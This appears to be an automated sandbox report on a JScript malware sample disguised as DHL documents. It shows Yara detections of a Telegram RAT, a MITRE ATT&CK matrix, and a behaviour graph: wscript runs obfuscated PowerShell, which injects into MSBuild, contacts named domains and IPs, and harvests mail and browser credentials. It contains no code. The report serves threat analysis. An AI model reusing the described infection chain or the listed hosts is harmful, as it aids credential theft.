                  Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a458530838.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a4587a94e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.powershell.exe.1a458530838.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information43
                  Scripting                  		Valid Accounts1
                  Native API                  		43
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		211
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Data Encoding                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  PowerShell                  		Login HookLogin Hook1
                  DLL Side-Loading                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                  Virtualization/Sandbox Evasion                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSHKeylogging13
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                  Process Injection                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618872 Sample: DHl-Global-Documents.js Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 21 reallyfreegeoip.org 2->21 23 kismetguzelim.com 2->23 25 9 other IPs or domains 2->25 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 47 14 other signatures 2->47 8 wscript.exe 1 1 2->8         started        signatures3 45 Tries to detect the country of the analysis system (by using the IP) 21->45 process4 signatures5 49 JScript performs obfuscated calls to suspicious functions 8->49 51 Suspicious powershell command line found 8->51 53 Wscript starts Powershell (via cmd or directly) 8->53 55 Suspicious execution chain found 8->55 11 powershell.exe 14 15 8->11         started        process6 dnsIp7 27 kismetguzelim.com 159.253.39.62, 443, 49732 NETINTERNETNetinternetBilisimTeknolojileriASTR Turkey 11->27 29 ip.3005.filemail.com 193.30.119.105, 443, 49731 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 11->29 57 Writes to foreign memory regions 11->57 59 Injects a PE file into a foreign processes 11->59 15 MSBuild.exe 15 2 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 31 checkip.dyndns.com 158.101.44.242, 49733, 80 ORACLE-BMC-31898US United States 15->31 33 reallyfreegeoip.org 104.21.32.1, 443, 49739 CLOUDFLARENETUS United States 15->33 35 Tries to steal Mail credentials (via file / registry access) 15->35 37 Tries to harvest and steal browser information (history, passwords, etc) 15->37 signatures11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.